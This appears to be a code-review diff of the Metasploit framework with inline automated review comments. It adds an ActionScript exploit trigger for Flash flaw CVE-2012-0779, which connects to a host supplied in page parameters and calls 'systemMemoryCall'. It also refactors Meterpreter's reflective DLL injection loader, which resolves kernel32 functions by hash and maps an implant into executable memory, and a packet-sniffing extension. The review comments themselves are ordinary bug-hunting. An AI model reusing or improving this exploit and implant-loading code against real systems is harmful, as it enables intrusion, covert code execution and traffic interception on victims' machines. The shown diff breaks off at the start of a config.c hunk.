+++ b/external/source/exploits/CVE-2012-0779/CVE_2012_0779.as
@@ -0,0 +1,35 @@
+package {
+ import flash.display.*;
+ import flash.utils.*;
+ import flash.net.*;
+ import flash.system.*;
+ import flash.text.*;
+ import flash.external.*;
+
+ public class CVE_2012_0779 extends Sprite {
+ private var v15:NetConnection;
+ private var v16:Responder;
+
+
+ public function CVE_2012_0779(){
+ var param:Object = LoaderInfo(this.root.loaderInfo).parameters;
+ this.v16 = new Responder(this.v23);
+ this.v15 = new NetConnection();
+ var _local2 = "rtmp://";
+ var _local3 = "/TSGeneralSetting";
+ var _local5 = param["var1"] + ":" + param["var2"];
+ var _local4:String = ((_local2 + _local5) + _local3);
+ this.v15.connect(_local4);
+ this.v15.call("systemMemoryCall", this.v16, "argc");
+ }
+
+ private function v23(_arg1:Object):void{
+ }
+
+ override public function get stage():Stage{
+ return super.stage;
+ }
+
+ NetConnection.defaultObjectEncoding = ObjectEncoding.AMF0;
+ }
+}//package
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c
index 27d1f18d12..fb2c3d7042 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c
@@ -40,21 +40,25 @@ HMODULE hMetSrv = NULL;
// To enable all of this in a new extnesion:
// 1. Add metsrv.dll to the DELAYLOAD option in the projects properties (Configuration->Linker->Input).
// 2. Add in the include file #include "DelayLoadMetSrv.h".
-// 3. Add the macro "EnableDelayLoadMetSrv();" after all you includes.
+// 3. Add the macro "EnableDelayLoadMetSrv();" after all your includes.
// 4. Add the line "hMetSrv = remote->hMetSrv;" in your InitServerExtension() function.
//===============================================================================================//
+
+
+
+
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli )
{
switch( dliNotify )
{
case dliNotePreLoadLibrary:
- // If we are tryinig to delay load metsrv.dll we can just return the
+ // If we are trying to delay load metsrv.dll we can just return the
// HMODULE of the injected metsrv library (set in InitServerExtension).
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return (FARPROC)hMetSrv;
break;
- case dliNotePreGetProcAddress :
+ case dliNotePreGetProcAddress:
// If we are trying to get the address of an exported function in the
// metsrv.dll we must use GetProcAddressR() in case the metsrv was loaded
// via reflective dll injection
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h
index f318cb030e..9632ef401c 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h
@@ -31,7 +31,7 @@
#define WIN32_LEAN_AND_MEAN
#include
#include
-#include "DelayLoadMetSrv.h"
+
#pragma comment (lib,"Delayimp.lib")
// we use this like a macro to set the hook in an server extension that requires it
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c b/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c
index 01b1fcb104..f2e17ee318 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c
@@ -107,7 +107,6 @@ DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
-
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c
index fe667a830d..b91343dede 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.c
@@ -36,6 +36,7 @@ UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
+
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
@@ -53,6 +54,9 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
+ VIRTUALLOCK pVirtualLock;
+ OUTPUTDEBUG pOutputDebug;
+
USHORT usCounter;
// the initial location of this image in memory
@@ -73,15 +77,21 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
+ UINT_PTR uiValueE;
+
+ register UINT_PTR inspect;
// STEP 0: calculate our images current base address
-
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
- __asm call geteip
- __asm geteip: pop uiLibraryAddress
+ __asm {
+ call geteip
+geteip:
+ pop uiLibraryAddress
+ }
+
#endif
// loop through memory backwards searching for our images base address
@@ -103,7 +113,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
}
uiLibraryAddress--;
}
-
+
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
@@ -130,7 +140,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
do
{
uiValueC = ror( (DWORD)uiValueC );
- // normalize to uppercase if the madule name is in lowercase
+ // normalize to uppercase if the module name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
@@ -163,7 +173,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
- usCounter = 3;
+ usCounter = 5;
// loop while we still have imports to find
while( usCounter > 0 )
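Review bot: `usCounter = 5` makes the export behind `OUTPUTDEBUG_HASH` a required lookup for the search loop, yet every use of `pOutputDebug` in the hunks of this file sits inside commented-out blocks (in the import loop and the thunk loop further down). The lookup, the hash comparison and those debug calls would be easier to keep in step behind one compile-time switch; at minimum add `// number of kernel32 exports resolved below - keep in sync with the hash list` next to the counter. The same point covers the two following hunks, which extend the hash comparison and the else-if chain. The loop body continues outside this hunk.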
@@ -172,7 +182,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
- if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
+ if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH || dwHashValue == VIRTUALLOCK_HASH || dwHashValue == OUTPUTDEBUG_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
@@ -187,7 +197,10 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
-
+ else if( dwHashValue == VIRTUALLOCK_HASH )
+ pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
+ else if( dwHashValue == OUTPUTDEBUG_HASH )
+ pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
@@ -207,6 +220,9 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+
+ // prevent our image from being swapped to the pagefile
+ pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
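Review bot: The return value of `pVirtualLock` is discarded and `uiBaseAddress` is not checked for NULL before it is passed in, so the comment above the call promises more than the code delivers. VirtualLock fails when the range does not fit the process's working-set limits, and the loader carries on regardless. Reword the comment to `// best effort: ask for the image to stay resident; the result is ignored`. The function continues outside this hunk.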
@@ -214,13 +230,16 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
+
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
-
- // itterate through all sections, loading them into memory.
- while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
+
+ uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
+
+ // iterate through all sections, loading them into memory.
+ while( uiValueE-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
@@ -236,21 +255,33 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
+
// STEP 4: process our images import table...
+
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
-
- // we assume their is an import table to process
- // uiValueC is the first entry in the import table
- uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
-
- // itterate through all imports
- while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
+ uiValueC = ( uiBaseAddress + (UINT_PTR)((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
+
+ // iterate through all imports until a null RVA is found (Characteristics is mis-named)
+ while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
{
+ /*
+ pOutputDebug("Loading library: ");
+ pOutputDebug((LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ));
+ pOutputDebug("\n");
+ */
+
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
+ if (! uiLibraryAddress) {
+ //pOutputDebug("Loading library FAILED\n");
+ // get the next import
+ uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
+ continue;
+ }
+
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
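Review bot: The loop terminator changed from `Name` to `Characteristics`, which is a union with `OriginalFirstThunk`, so a descriptor that has a name and a `FirstThunk` but a zero `OriginalFirstThunk` now ends the walk early and every import after it is left unprocessed. Some linkers emit descriptors like that, and the body below still reads `OriginalFirstThunk` and `Name` as separate fields. Testing `((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name` as before keeps the terminator independent of that field. The new `continue` after a failed `pLoadLibraryA` also skips the descriptor silently, and deserves a comment saying that its thunks stay unresolved. The loop body continues outside this hunk.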
@@ -285,9 +316,15 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
+ /*
+ pOutputDebug("Resolving function: ");
+ pOutputDebug((LPCSTR)( (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ));
+ pOutputDebug("\n");
+ */
// use GetProcAddress and patch in the address for this imported function
- DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
+ DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
+
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
@@ -299,6 +336,7 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
+
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
@@ -307,13 +345,13 @@ DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
- // check if their are any relocations present
+ // check if there are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
- // and we itterate through all entries...
+ // and we iterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
diff --git a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h
index b8f9112b8e..fc54cc501c 100644
--- a/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h
+++ b/external/source/meterpreter/source/ReflectiveDLLInjection/ReflectiveLoader.h
@@ -42,11 +42,15 @@
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
+typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T);
+typedef LPVOID (WINAPI * OUTPUTDEBUG)(LPCSTR);
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
+#define VIRTUALLOCK_HASH 0x0ef632f2
+#define OUTPUTDEBUG_HASH 0x470d22bc
#define HASH_KEY 13
//===============================================================================================//
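Review bot: The two new function-pointer typedefs declare the wrong return type. VirtualLock returns `BOOL`, and OutputDebugStringA (assuming that is what `OUTPUTDEBUG` stands for, as the `LPCSTR` parameter suggests) returns nothing, but both are declared as returning `LPVOID`. They should read `typedef BOOL (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );` and `typedef VOID (WINAPI * OUTPUTDEBUG)( LPCSTR );`. With the current declarations a caller that tests the result of `pVirtualLock` would be comparing a pointer-sized value rather than a BOOL.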
@@ -70,6 +74,7 @@ __forceinline DWORD hash( char * c )
return h;
}
+
//===============================================================================================//
typedef struct _UNICODE_STR
{
@@ -192,6 +197,8 @@ typedef struct
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
+
+
//===============================================================================================//
#endif
//===============================================================================================//
diff --git a/external/source/meterpreter/source/backcompat/backcompat.asm b/external/source/meterpreter/source/backcompat/backcompat.asm
new file mode 100644
index 0000000000..fbe3c1c76c
--- /dev/null
+++ b/external/source/meterpreter/source/backcompat/backcompat.asm
@@ -0,0 +1,24 @@
+.model flat, C
+
+.data
+__imp__EncodePointer@4 dd dummy
+__imp__DecodePointer@4 dd dummy
+__imp__HeapSetInformation@16 dd dummy2
+
+EXTERNDEF __imp__EncodePointer@4 : DWORD
+EXTERNDEF __imp__DecodePointer@4 : DWORD
+EXTERNDEF __imp__HeapSetInformation@16 : DWORD
+
+.code
+
+dummy proc
+mov eax, [esp+4]
+ret 4
+dummy endp
+
+dummy2 proc
+mov eax, 1
+ret 10h
+dummy2 endp
+
+end
\ No newline at end of file
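Review bot: This new file has no comment explaining that it replaces the import thunks for EncodePointer, DecodePointer and HeapSetInformation with local stubs. `dummy` returns its argument unchanged and `dummy2` returns 1 without doing anything, so any binary that links backcompat.lib gets no pointer encoding and a HeapSetInformation call that reports success while setting nothing. A header comment should state that trade-off and the reason for it, presumably so the binaries load on Windows versions that lack these exports, given the `editbin.exe /OSVERSION:5.0` step in elevator.vcxproj. It should also say that `.model flat` and the decorated `@4`/`@16` names make the file x86-only.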
diff --git a/external/source/meterpreter/source/common/common.h b/external/source/meterpreter/source/common/common.h
index 8ef632887f..85a3d4adf8 100644
--- a/external/source/meterpreter/source/common/common.h
+++ b/external/source/meterpreter/source/common/common.h
@@ -129,10 +129,11 @@ void real_dprintf(char *filename, int line, const char *function, char *format,
#ifdef _WIN32
+
#include
// Enable debugging
-// #define DEBUGTRACE 1
+//#define DEBUGTRACE 1
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)
diff --git a/external/source/meterpreter/source/extensions/priv/server/priv.c b/external/source/meterpreter/source/extensions/priv/server/priv.c
index 5be0572f12..a75fa84b8b 100644
--- a/external/source/meterpreter/source/extensions/priv/server/priv.c
+++ b/external/source/meterpreter/source/extensions/priv/server/priv.c
@@ -13,7 +13,6 @@
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
-//#include "../../../ReflectiveDLLInjection/ReflectiveLoader.c"
Command customCommands[] =
{
diff --git a/external/source/meterpreter/source/extensions/sniffer/precomp.h b/external/source/meterpreter/source/extensions/sniffer/precomp.h
new file mode 100644
index 0000000000..3730d7f862
--- /dev/null
+++ b/external/source/meterpreter/source/extensions/sniffer/precomp.h
@@ -0,0 +1,23 @@
+#ifndef METERPRETER_SOURCE_EXTENSION_SNIFFER_SERVER_PRECOMP_H
+#define METERPRETER_SOURCE_EXTENSION_SNIFFER_SERVER_PRECOMP_H
+
+#define _WIN32_WINNT 0x0400
+
+#include "sniffer.h"
+
+#ifdef _WIN32
+
+#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
+#include "../../ReflectiveDLLInjection/GetProcAddressR.h"
+#include "../../ReflectiveDLLInjection/ReflectiveLoader.h"
+
+// declared in ReflectiveLoader.c and set by DllMain also in ReflectiveLoader.c
+extern HINSTANCE hAppInstance;
+
+#endif
+
+#define strcasecmp stricmp
+
+
+
+#endif
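Review bot: `#define strcasecmp stricmp` and `#define _WIN32_WINNT 0x0400` sit outside the `#ifdef _WIN32` block, and sniffer.c in this commit includes precomp.h before its own `#ifdef _WIN32`, so the non-Windows branch appears to pick them up as well. There the first define would rename a libc function to one that does not exist. Both belong inside the `_WIN32` block. The value 0x0400 also differs from the `0x0500` that metsrv.h sets in this same commit, so each should be wrapped in `#ifndef _WIN32_WINNT` and use one agreed value.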
diff --git a/external/source/meterpreter/source/extensions/sniffer/sniffer.c b/external/source/meterpreter/source/extensions/sniffer/sniffer.c
index a5b8652f2f..c2e06260cb 100644
--- a/external/source/meterpreter/source/extensions/sniffer/sniffer.c
+++ b/external/source/meterpreter/source/extensions/sniffer/sniffer.c
@@ -2,27 +2,32 @@
* This module implements packet sniffing features
*/
#define _CRT_SECURE_NO_DEPRECATE 1
-#include "../../common/common.h"
-#include "sniffer.h"
+
+#include "precomp.h"
+
#ifdef _WIN32
-#include "../../ReflectiveDLLInjection/DelayLoadMetSrv.h"
// include the Reflectiveloader() function, we end up linking back to the metsrv.dll's Init function
-// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
+// but this doesnt matter as we wont ever call DLL_METASPLOIT_ATTACH as that is only used by the
// second stage reflective dll inject payload and not the metsrv itself when it loads extensions.
#include "../../ReflectiveDLLInjection/ReflectiveLoader.c"
+// NOTE: _CRT_SECURE_NO_WARNINGS has been added to Configuration->C/C++->Preprocessor->Preprocessor
+
// this sets the delay load hook function, see DelayLoadMetSrv.h
EnableDelayLoadMetSrv();
+
#define check_pssdk(); if(!hMgr && pktsdk_initialize()!=0){packet_transmit_response(hErr, remote, response);return(hErr);}
HANDLE hMgr;
DWORD hErr;
DWORD pktsdk_initialize(void) {
+ dprintf("sniffer>> calling MgrCreate()...");
+
hMgr = MgrCreate();
if(! hMgr){
dprintf("sniffer>> failed to allocate a new Mgr object");
@@ -60,6 +65,10 @@ void __stdcall sniffer_receive(DWORD_PTR Param, DWORD_PTR ThParam, HANDLE hPacke
#else // posix side
+#include "sniffer.h"
+#include "../../common/common.h"
+
+
#define check_pssdk()
char *get_interface_name_by_index(unsigned int fidx)
@@ -671,7 +680,7 @@ DWORD request_sniffer_capture_start(Remote *remote, Packet *packet) {
#endif
- j->pkts = calloc(maxp, sizeof(HANDLE));
+ j->pkts = (HANDLE *) calloc(maxp, sizeof(HANDLE));
if(j->pkts == NULL) {
#ifdef _WIN32
AdpCloseAdapter(j->adp);
@@ -1089,6 +1098,8 @@ DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
DWORD index;
+ hMetSrv = remote->hMetSrv;
+
dprintf("[SERVER] Registering command handlers...");
for (index = 0; customCommands[index].method; index++) {
dprintf("Registering command index %d", index);
diff --git a/external/source/meterpreter/source/extensions/sniffer/sniffer.h b/external/source/meterpreter/source/extensions/sniffer/sniffer.h
index 79d4da60d8..6b46f71e71 100644
--- a/external/source/meterpreter/source/extensions/sniffer/sniffer.h
+++ b/external/source/meterpreter/source/extensions/sniffer/sniffer.h
@@ -1,108 +1,110 @@
-#ifndef _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
-#define _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
-
-#ifdef _WIN32
-
-#include
-#include
-
-#include "HNPsSdkUser.h"
-#include "dnet.h"
-
-#else
-
-#include
-
-#ifndef ERROR_ACCESS_DENIED
- #define ERROR_ACCESS_DENIED EACCES
-#endif
-
-#endif
-
-#include "../../common/common.h"
-
-typedef struct capturejob
-{
- unsigned int active;
- unsigned int intf;
- unsigned int max_pkts;
- unsigned int idx_pkts;
- unsigned int cur_pkts;
- unsigned int cur_bytes;
- unsigned int mtu;
- HANDLE adp;
- HANDLE *pkts;
- unsigned char *dbuf;
- unsigned int dlen;
- unsigned int didx;
- int capture_linktype; //current capture link type that we want to save, ie. LINKTYPE_ETHERNET
-#ifndef _WIN32
- THREAD *thread;
- pcap_t *pcap;
-#endif
-} CaptureJob;
-
-#define TLV_TYPE_EXTENSION_SNIFFER 0
-
-
-#define TLV_TYPE_SNIFFER_INTERFACES \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 1)
-
-#define TLV_TYPE_SNIFFER_INTERFACE_ID \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 2)
-
-#define TLV_TYPE_SNIFFER_INTERFACE_HANDLE \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 3)
-
-#define TLV_TYPE_SNIFFER_PACKET_COUNT \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 4)
-
-#define TLV_TYPE_SNIFFER_BYTE_COUNT \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_UINT, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 5)
-
-#define TLV_TYPE_SNIFFER_EXCLUDE_PORTS \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 6)
-
-#define TLV_TYPE_SNIFFER_INCLUDE_PORTS \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 7)
-
-#define TLV_TYPE_SNIFFER_PACKETS \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_GROUP, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 8)
-
-#define TLV_TYPE_SNIFFER_PACKET \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_RAW, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 9)
-
-#define TLV_TYPE_SNIFFER_ADDITIONAL_FILTER \
- MAKE_CUSTOM_TLV( \
- TLV_META_TYPE_STRING, \
- TLV_TYPE_EXTENSION_SNIFFER, \
- TLV_EXTENSIONS + 10)
-
-#endif
+#ifndef _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
+#define _METERPRETER_SOURCE_EXTENSION_SNIFFER_SNIFFER_H
+
+#ifdef _WIN32
+
+#include "../../common/common.h"
+
+#include
+#include
+
+#include
+#include "dnet.h"
+
+#else
+
+#include
+
+#ifndef ERROR_ACCESS_DENIED
+ #define ERROR_ACCESS_DENIED EACCES
+#endif
+
+#endif
+
+#include "../../common/common.h"
+
+typedef struct capturejob
+{
+ unsigned int active;
+ unsigned int intf;
+ unsigned int max_pkts;
+ unsigned int idx_pkts;
+ unsigned int cur_pkts;
+ unsigned int cur_bytes;
+ unsigned int mtu;
+ HANDLE adp;
+ HANDLE *pkts;
+ unsigned char *dbuf;
+ unsigned int dlen;
+ unsigned int didx;
+ int capture_linktype; //current capture link type that we want to save, ie. LINKTYPE_ETHERNET
+#ifndef _WIN32
+ THREAD *thread;
+ pcap_t *pcap;
+#endif
+} CaptureJob;
+
+#define TLV_TYPE_EXTENSION_SNIFFER 0
+
+
+#define TLV_TYPE_SNIFFER_INTERFACES \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 1)
+
+#define TLV_TYPE_SNIFFER_INTERFACE_ID \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 2)
+
+#define TLV_TYPE_SNIFFER_INTERFACE_HANDLE \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 3)
+
+#define TLV_TYPE_SNIFFER_PACKET_COUNT \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 4)
+
+#define TLV_TYPE_SNIFFER_BYTE_COUNT \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_UINT, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 5)
+
+#define TLV_TYPE_SNIFFER_EXCLUDE_PORTS \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 6)
+
+#define TLV_TYPE_SNIFFER_INCLUDE_PORTS \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 7)
+
+#define TLV_TYPE_SNIFFER_PACKETS \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_GROUP, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 8)
+
+#define TLV_TYPE_SNIFFER_PACKET \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_RAW, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 9)
+
+#define TLV_TYPE_SNIFFER_ADDITIONAL_FILTER \
+ MAKE_CUSTOM_TLV( \
+ TLV_META_TYPE_STRING, \
+ TLV_TYPE_EXTENSION_SNIFFER, \
+ TLV_EXTENSIONS + 10)
+
+#endif
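Review bot: In the rewritten header `../../common/common.h` is now included twice on Windows, once at the top of the `#ifdef _WIN32` branch and again after the `#endif`. The second include covers both platforms, so the first can go unless the Windows-only headers need it earlier, in which case a comment should say so. Every line of the file is shown as changed although the body looks identical, which suggests a line-ending conversion; committing that separately would keep the real change to the include list reviewable.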
diff --git a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
index 6fa78e7fc6..c61fed7469 100644
--- a/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
+++ b/external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c
